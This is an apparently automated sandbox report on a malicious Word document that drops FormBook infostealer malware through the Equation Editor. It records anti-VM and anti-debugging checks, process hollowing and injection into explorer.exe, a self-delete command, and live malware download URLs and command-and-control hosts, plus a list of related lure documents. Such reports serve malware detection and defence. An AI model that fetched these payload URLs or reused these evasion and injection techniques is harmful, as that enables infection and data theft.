Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmmon32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Yara detected AntiVM3

Show sources

Source: Yara match	File source: 4.2.obinnamaxdw2962.exe.220ed1c.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.426482026.00000000021D1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.426552817.0000000002233000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: obinnamaxdw2962.exe PID: 2612, type: MEMORYSTR

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Show sources

Source: obinnamaxdw2962.exe, 00000004.00000002.426482026.00000000021D1000.00000004.00000001.sdmp	Binary or memory string: SBIEDLL.DLL
Source: obinnamaxdw2962.exe, 00000004.00000002.426482026.00000000021D1000.00000004.00000001.sdmp	Binary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME

Tries to detect virtualization through RDTSC time measurements

Show sources

Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe	RDTSC instruction interceptor: First address: 0000000000409904 second address: 000000000040990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe	RDTSC instruction interceptor: First address: 0000000000409B7E second address: 0000000000409B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\cmmon32.exe	RDTSC instruction interceptor: First address: 0000000000089904 second address: 000000000008990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\cmmon32.exe	RDTSC instruction interceptor: First address: 0000000000089B7E second address: 0000000000089B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2588	Thread sleep time: -240000s >= -30000s
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe TID: 1444	Thread sleep time: -41690s >= -30000s
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe TID: 1724	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\cmmon32.exe TID: 2520	Thread sleep time: -32000s >= -30000s

Source: C:\Windows\SysWOW64\cmmon32.exe

Last function: Thread delayed

Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe

Code function: 5_2_00409AB0 rdtsc

Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe

Thread delayed: delay time: 922337203685477

Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe

Process information queried: ProcessInformation

Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe	Thread delayed: delay time: 41690
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe	Thread delayed: delay time: 922337203685477

Source: explorer.exe, 00000006.00000000.445863890.000000000449C000.00000004.00000001.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
Source: explorer.exe, 00000006.00000000.428251777.0000000000255000.00000004.00000020.sdmp	Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: obinnamaxdw2962.exe, 00000004.00000002.426482026.00000000021D1000.00000004.00000001.sdmp	Binary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: obinnamaxdw2962.exe, 00000004.00000002.426482026.00000000021D1000.00000004.00000001.sdmp	Binary or memory string: vmware
Source: explorer.exe, 00000006.00000000.473898771.000000000456F000.00000004.00000001.sdmp	Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
Source: explorer.exe, 00000006.00000000.445901799.00000000044E7000.00000004.00000001.sdmp	Binary or memory string: ide\cdromnecvmwar_vmware_sata_cd01_______________1.00____\6&373888b8&0&1.0.0
Source: explorer.exe, 00000006.00000000.428344606.000000000029B000.00000004.00000020.sdmp	Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0*N
Source: explorer.exe, 00000006.00000000.446097272.00000000045D6000.00000004.00000001.sdmp	Binary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: obinnamaxdw2962.exe, 00000004.00000002.426482026.00000000021D1000.00000004.00000001.sdmp	Binary or memory string: VMware SVGA II
Source: obinnamaxdw2962.exe, 00000004.00000002.426482026.00000000021D1000.00000004.00000001.sdmp	Binary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools

Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe

Code function: 5_2_00409AB0 rdtsc

Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\cmmon32.exe	Process token adjusted: Debug

Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe	Code function: 5_2_00AF26F8 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 7_2_021426F8 mov eax, dword ptr fs:[00000030h]

Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe	Process queried: DebugPort
Source: C:\Windows\SysWOW64\cmmon32.exe	Process queried: DebugPort

Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe

Code function: 5_2_0040ACF0 LdrLoadDll,

Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe

Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\explorer.exe	Domain query: www.islamic-coins.com
Source: C:\Windows\explorer.exe	Network Connect: 2.57.140.50 80

Sample uses process hollowing technique

Show sources

Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe

Section unmapped: C:\Windows\SysWOW64\cmmon32.exe base address: D00000

Maps a DLL or memory area into another process

Show sources

Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe	Section loaded: unknown target: C:\Windows\SysWOW64\cmmon32.exe protection: execute and read and write
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe	Section loaded: unknown target: C:\Windows\SysWOW64\cmmon32.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\cmmon32.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\cmmon32.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write

Injects a PE file into a foreign processes

Show sources

Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe

Memory written: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe base: 400000 value starts with: 4D5A

Queues an APC in another process (thread injection)

Show sources

Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe

Thread APC queued: target process: C:\Windows\explorer.exe

Modifies the context of a thread in another process (thread injection)

Show sources

Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe	Thread register set: target process: 1764
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe	Thread register set: target process: 1764
Source: C:\Windows\SysWOW64\cmmon32.exe	Thread register set: target process: 1764

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe	Process created: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe
Source: C:\Windows\SysWOW64\cmmon32.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe'

Source: explorer.exe, 00000006.00000000.441650262.0000000000750000.00000002.00020000.sdmp, cmmon32.exe, 00000007.00000002.682606786.0000000000D10000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000006.00000000.428251777.0000000000255000.00000004.00000020.sdmp	Binary or memory string: ProgmanG
Source: explorer.exe, 00000006.00000000.441650262.0000000000750000.00000002.00020000.sdmp, cmmon32.exe, 00000007.00000002.682606786.0000000000D10000.00000002.00020000.sdmp	Binary or memory string: !Progman
Source: explorer.exe, 00000006.00000000.441650262.0000000000750000.00000002.00020000.sdmp, cmmon32.exe, 00000007.00000002.682606786.0000000000D10000.00000002.00020000.sdmp	Binary or memory string: Program Manager<

Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe

Queries volume information: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe VolumeInformation

Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

Yara detected FormBook

Show sources

Source: Yara match	File source: 5.2.obinnamaxdw2962.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.505046149.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.682290111.00000000002F0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.504859779.00000000000F0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.427647092.00000000031D1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.505001814.0000000000240000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.449050958.0000000009A6D000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.682028966.0000000000080000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.456579155.0000000009A6D000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.682330562.0000000000380000.00000004.00000001.sdmp, type: MEMORY

Remote Access Functionality:

Yara detected FormBook

Show sources

Source: Yara match	File source: 5.2.obinnamaxdw2962.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.505046149.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.682290111.00000000002F0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.504859779.00000000000F0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.427647092.00000000031D1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.505001814.0000000000240000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.449050958.0000000009A6D000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.682028966.0000000000080000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.456579155.0000000009A6D000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.682330562.0000000000380000.00000004.00000001.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Shared Modules1	Path Interception	Process Injection612	Rootkit1	Credential API Hooking1	Security Software Discovery321	Remote Services	Credential API Hooking1	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Exploitation for Client Execution13	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Masquerading1	LSASS Memory	Process Discovery2	Remote Desktop Protocol	Archive Collected Data1	Exfiltration Over Bluetooth	Ingress Tool Transfer12	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Disable or Modify Tools1	Security Account Manager	Virtualization/Sandbox Evasion31	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Application Layer Protocol2	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Virtualization/Sandbox Evasion31	NTDS	Remote System Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol122	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Process Injection612	LSA Secrets	File and Directory Discovery1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Deobfuscate/Decode Files or Information1	Cached Domain Credentials	System Information Discovery113	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Obfuscated Files or Information3	DCSync	Network Sniffing	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Software Packing12	Proc Filesystem	Network Service Scanning	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
OBL PN210700369.doc	31%	ReversingLabs	Document-RTF.Exploit.Heuristic

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\obinnazx[1].exe	18%	ReversingLabs	Win32.Trojan.Generic
C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe	18%	ReversingLabs	Win32.Trojan.Generic

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
5.2.obinnamaxdw2962.exe.400000.1.unpack	100%	Avira	TR/Crypt.ZPACK.Gen		Download File

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://wellformedweb.org/CommentAPI/	0%	URL Reputation	safe
http://www.rspb.org.uk/wildlife/birdguide/name/	0%	Avira URL Cloud	safe
http://www.iis.fhg.de/audioPA	0%	URL Reputation	safe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true	0%	URL Reputation	safe
http://treyresearch.net	0%	URL Reputation	safe
http://java.sun.com	0%	Avira URL Cloud	safe
http://www.icra.org/vocabulary/.	0%	URL Reputation	safe
http://lg-tv.tk/obinnazx.exe	100%	Avira URL Cloud	malware
http://computername/printers/printername/.printer	0%	Avira URL Cloud	safe
http://www.%s.comPA	0%	URL Reputation	safe
www.vaughnmethod.com/ed9s/	0%	Avira URL Cloud	safe
http://www.islamic-coins.com/ed9s/?tXNH2v=aXG8CVn8ddSLaR&ydudnHn=k2ojovXzPk6QP2E57heACoDYW6OrA9sZh3WmhaFm9atosFE1d0WL15gHEPMcVErHBLYJUA==	0%	Avira URL Cloud	safe
http://servername/isapibackend.dll	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
lg-tv.tk	185.239.243.112	true	true		unknown
www.islamic-coins.com	2.57.140.50	true	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://lg-tv.tk/obinnazx.exe	true	Avira URL Cloud: malware	unknown
www.vaughnmethod.com/ed9s/	true	Avira URL Cloud: safe	low
http://www.islamic-coins.com/ed9s/?tXNH2v=aXG8CVn8ddSLaR&ydudnHn=k2ojovXzPk6QP2E57heACoDYW6OrA9sZh3WmhaFm9atosFE1d0WL15gHEPMcVErHBLYJUA==	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.windows.com/pctv.	explorer.exe, 00000006.00000000.442663039.0000000002AE0000.00000002.00020000.sdmp	false		high
http://investor.msn.com	explorer.exe, 00000006.00000000.442663039.0000000002AE0000.00000002.00020000.sdmp	false		high
http://www.msnbc.com/news/ticker.txt	explorer.exe, 00000006.00000000.442663039.0000000002AE0000.00000002.00020000.sdmp	false		high
http://www.msn.com/de-de/?ocid=iehp#	explorer.exe, 00000006.00000000.453569715.0000000004513000.00000004.00000001.sdmp	false		high
http://wellformedweb.org/CommentAPI/	explorer.exe, 00000006.00000000.434703188.0000000004650000.00000002.00020000.sdmp	false	URL Reputation: safe	unknown
http://www.rspb.org.uk/wildlife/birdguide/name/	obinnamaxdw2962.exe, obinnamaxdw2962.exe, 00000005.00000000.424542782.00000000009E2000.00000020.00020000.sdmp, cmmon32.exe, 00000007.00000002.683308927.000000000261F000.00000004.00020000.sdmp, obinnamaxdw2962.exe.2.dr	false	Avira URL Cloud: safe	unknown
https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1	explorer.exe, 00000006.00000000.428495981.000000000031D000.00000004.00000020.sdmp	false		high
http://www.iis.fhg.de/audioPA	explorer.exe, 00000006.00000000.434703188.0000000004650000.00000002.00020000.sdmp	false	URL Reputation: safe	unknown
https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1LMEM	explorer.exe, 00000006.00000000.446097272.00000000045D6000.00000004.00000001.sdmp	false		high
http://windowsmedia.com/redir/services.asp?WMPFriendly=true	explorer.exe, 00000006.00000000.451916106.0000000002CC7000.00000002.00020000.sdmp	false	URL Reputation: safe	unknown
http://www.hotmail.com/oe	explorer.exe, 00000006.00000000.442663039.0000000002AE0000.00000002.00020000.sdmp	false		high
http://treyresearch.net	explorer.exe, 00000006.00000000.434703188.0000000004650000.00000002.00020000.sdmp	false	URL Reputation: safe	unknown
https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBSKZM1Y&prvid=77%2	explorer.exe, 00000006.00000000.437278469.0000000008374000.00000004.00000001.sdmp	false		high
https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1b	explorer.exe, 00000006.00000000.437278469.0000000008374000.00000004.00000001.sdmp	false		high
http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check	explorer.exe, 00000006.00000000.451916106.0000000002CC7000.00000002.00020000.sdmp	false		high
http://java.sun.com	explorer.exe, 00000006.00000000.428251777.0000000000255000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
http://www.icra.org/vocabulary/.	explorer.exe, 00000006.00000000.451916106.0000000002CC7000.00000002.00020000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.	explorer.exe, 00000006.00000000.428947548.0000000001BE0000.00000002.00020000.sdmp	false		high
http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv	explorer.exe, 00000006.00000000.455748131.0000000008412000.00000004.00000001.sdmp	false		high
http://investor.msn.com/	explorer.exe, 00000006.00000000.442663039.0000000002AE0000.00000002.00020000.sdmp	false		high
http://www.msn.com/?ocid=iehp	explorer.exe, 00000006.00000000.446097272.00000000045D6000.00000004.00000001.sdmp	false		high
http://www.msn.com/de-de/?ocid=iehp	explorer.exe, 00000006.00000000.453569715.0000000004513000.00000004.00000001.sdmp	false		high
http://www.piriform.com/ccleaner	explorer.exe, 00000006.00000000.455748131.0000000008412000.00000004.00000001.sdmp	false		high
http://computername/printers/printername/.printer	explorer.exe, 00000006.00000000.434703188.0000000004650000.00000002.00020000.sdmp	false	Avira URL Cloud: safe	low
http://www.%s.comPA	explorer.exe, 00000006.00000000.428947548.0000000001BE0000.00000002.00020000.sdmp	false	URL Reputation: safe	low
http://www.autoitscript.com/autoit3	explorer.exe, 00000006.00000000.428251777.0000000000255000.00000004.00000020.sdmp	false		high
http://www.msn.com/?ocid=iehped2	explorer.exe, 00000006.00000000.446097272.00000000045D6000.00000004.00000001.sdmp	false		high
https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1J	explorer.exe, 00000006.00000000.437278469.0000000008374000.00000004.00000001.sdmp	false		high
https://support.mozilla.org	explorer.exe, 00000006.00000000.428251777.0000000000255000.00000004.00000020.sdmp	false		high
http://www.piriform.com/ccleanerv	explorer.exe, 00000006.00000000.437278469.0000000008374000.00000004.00000001.sdmp	false		high
http://servername/isapibackend.dll	explorer.exe, 00000006.00000000.452943975.0000000003E50000.00000002.00020000.sdmp	false	Avira URL Cloud: safe	low

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
2.57.140.50	www.islamic-coins.com	France		43424	MAGICRETAILFR	true
185.239.243.112	lg-tv.tk	Moldova Republic of		55933	CLOUDIE-AS-APCloudieLimitedHK	true

General Information

Joe Sandbox Version:	33.0.0 White Diamond
Analysis ID:	491424
Start date:	27.09.2021
Start time:	15:20:06
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 13m 21s
Hypervisor based Inspection enabled:	false
Report type:	light
Sample file name:	OBL PN210700369.doc
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:	11
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.expl.evad.winDOC@9/8@3/2
EGA Information:	Failed
HDC Information:	Successful, ratio: 6.4% (good quality ratio 6%) Quality average: 69.7% Quality standard deviation: 27.8%
HCA Information:	Successful, ratio: 99% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .doc Found Word or Excel or PowerPoint or XPS Viewer Attach to Office via COM Scroll down Close Viewer
Warnings:	Show All Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe, svchost.exe TCP Packets have been reduced to 100 Not all processes where analyzed, report is missing behavior information Report size exceeded maximum capacity and may have missing behavior information. Report size getting too big, too many NtCreateFile calls found. Report size getting too big, too many NtEnumerateValueKey calls found. Report size getting too big, too many NtQueryAttributesFile calls found. VT rate limit hit for: /opt/package/joesandbox/database/analysis/491424/sample/OBL PN210700369.doc

Simulations

Behavior and APIs

Time	Type	Description
15:20:21	API Interceptor	36x Sleep call for process: EQNEDT32.EXE modified
15:20:22	API Interceptor	118x Sleep call for process: obinnamaxdw2962.exe modified
15:21:05	API Interceptor	197x Sleep call for process: cmmon32.exe modified
15:22:10	API Interceptor	1x Sleep call for process: explorer.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
185.239.243.112	Proforma invoice.doc	Get hash	malicious	Browse	fantecheo.tk/ibefrankzx.exe
	J21021 TUBI PER QUALIFICHE.doc	Get hash	malicious	Browse	xleetaz.xyz/prison/ikk.exe
	RFQ9003930 New Order.doc	Get hash	malicious	Browse	lg-tv.tk/harshmanzx.exe
	WELDED PIPES - Bid No 2000543592- PR.doc	Get hash	malicious	Browse	xleetaz.xyz/prison/sam.exe
	AWB.doc	Get hash	malicious	Browse	fantecheo.tk/famzlogszx.exe
	New Order.doc	Get hash	malicious	Browse	lg-tv.tk/bulizx.exe
	DO526.doc	Get hash	malicious	Browse	fantecheo.tk/famzlogszx.exe
	24-09-2021 LETTER OF INTENT.doc	Get hash	malicious	Browse	lg-tv.tk/bankzx.exe
	DHL#AWB#29721.doc	Get hash	malicious	Browse	fantecheo.tk/princezx.exe
	PO2021.doc	Get hash	malicious	Browse	fantecheo.tk/ibefrankzx.exe
	PON507991 Copy.doc	Get hash	malicious	Browse	lg-tv.tk/bryantzx.exe
	OUTSTANDING PAYMENT.doc	Get hash	malicious	Browse	xleetaz.xyz/benx/nd.exe
	New Order.doc	Get hash	malicious	Browse	xleetaz.xyz/benx/bd.exe
	Proforma Invoice 28093.doc	Get hash	malicious	Browse	xleetaz.xyz/benx/sy.exe
	BL UALBHHOU1.doc	Get hash	malicious	Browse	xleetaz.xyz/benx/mb.exe
	Pedido 20839.doc	Get hash	malicious	Browse	fantecheo.tk/chungzx.exe
	catalogue.doc	Get hash	malicious	Browse	lg-tv.tk/shakitizx.exe
	SWIFT.doc	Get hash	malicious	Browse	lg-tv.tk/obizx.exe
	TU22.doc	Get hash	malicious	Browse	fantecheo.tk/famzlogszx.exe
	AVB CMAU6526450 40HC COI2100105.doc	Get hash	malicious	Browse	lg-tv.tk/bluezx.exe

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
